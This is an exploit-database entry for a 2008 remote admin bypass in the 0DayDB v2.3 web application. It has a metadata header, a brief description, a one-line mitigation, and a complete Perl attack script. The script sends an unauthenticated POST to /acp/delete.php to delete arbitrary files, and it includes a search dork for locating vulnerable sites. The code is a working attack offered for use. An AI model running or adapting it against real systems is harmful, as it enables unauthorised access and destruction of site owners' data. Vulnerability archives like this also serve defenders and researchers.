0DayDB v2.3 Remote Admin Bypass

vendor:

0DayDB v2.3

by:

Pr0metheuS

7.5

CVSS

HIGH

Remote Admin Bypass

287

CWE

Product Name: 0DayDB v2.3

Affected Version From: v2.3

Affected Version To: v2.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

0DayDB v2.3 Remote Admin Bypass

This exploit allows an attacker to bypass the authentication of the 0DayDB v2.3 web application and gain access to the administrative panel. The attacker can send a POST request to the delete.php page with the ID of the file they want to delete. This will allow them to delete any file without authentication.

Mitigation:

Ensure that all administrative functions are properly authenticated and that access to the administrative panel is restricted to authorized users.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#Autor : Pr0metheuS
#Script : 0DayDB v2.3
#Version : v2.3
#Dork : "Powered By 0DayDB v2.3"
#Gr33tz-Team.org
use LWP::UserAgent;
if(@ARGV!=3){
	print "*****************\n";
	print "0DayDB v2.3 Remote Admin Bypass\n";
    print "perl $0 <site> <path> <id>\n";
    print "downloads ID for delete\n";
    print "*****************\n";
}
($site,$path,$id)=@ARGV;
sub pri {
	print "*****************\n";
	print "[+] Exploit completed\n";
	print "*****************";
}
sub con {
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("id=".$id."");
$res = $ua->request($req);
if ($res->is_success) {
	pri();
}
}
con();

# milw0rm.com [2008-01-11]